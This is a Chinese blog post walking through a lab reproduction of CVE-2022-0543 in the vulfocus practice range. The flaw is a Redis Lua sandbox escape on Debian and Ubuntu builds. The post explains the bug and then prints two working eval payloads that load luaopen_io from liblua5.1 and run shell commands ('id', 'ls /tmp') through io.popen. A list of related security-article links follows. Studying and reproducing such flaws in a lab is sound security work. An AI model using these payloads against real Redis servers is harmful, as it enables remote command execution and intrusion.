vulfocus靶场之redis命令执行cve-2022-0543漏洞复现

漏洞:

Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。

Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。

我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数,即可获得io库,再使用其执行命令

1.工具方式: 使用Another Redis Desktop Manager

地址:AnotherRedisDesktopManager 发行版 - Gitee.com

输入网址和端口,点击OK

显示连接成功

输入攻击代码 payload即可:

查看当前id ,需要更改的地方红色字体:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

查看ls /tmp

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("ls /tmp", "r"); local res = f:read("*a"); f:close(); return res' 0

拿到flag:

相关推荐
唯有选择几秒前
是时候用ED25519替代RSA了:Rust库`crypto_box`实践
安全·rust
Le_ee21 分钟前
dvwa6——Insecure CAPTCHA
android·安全·网络安全·靶场·dvwa
成都盛瑟传感技术有限公司1 小时前
云台式激光甲烷探测器:守护工业安全的“智慧之眼”
安全
hao_wujing2 小时前
网络安全大模型理解
安全·web安全
禾木KG2 小时前
网络安全-等级保护(等保) 3-3-1 GB/T 36627-2018 附录A (资料性附录) 测评后活动、附 录 B (资料性附录)渗透测试的有关概念说明
网络·安全·web安全
Cyyyy_g2 小时前
网络安全防御指南:全方位抵御暴力破解攻击
网络·安全
mooyuan天天2 小时前
pikachu靶场通关笔记12 XSS关卡08-XSS之htmlspecialchars(四种方法渗透)
安全·xss·pikachu靶场·xss漏洞
m0_694845573 小时前
云服务器如何连接和远程操作?
linux·运维·服务器·安全·云计算
黑客笔记3 小时前
安全大模型的思考
数据库·安全·web安全
摸鱼也很难6 小时前
web攻防之SSTI 注入漏洞
安全·ssti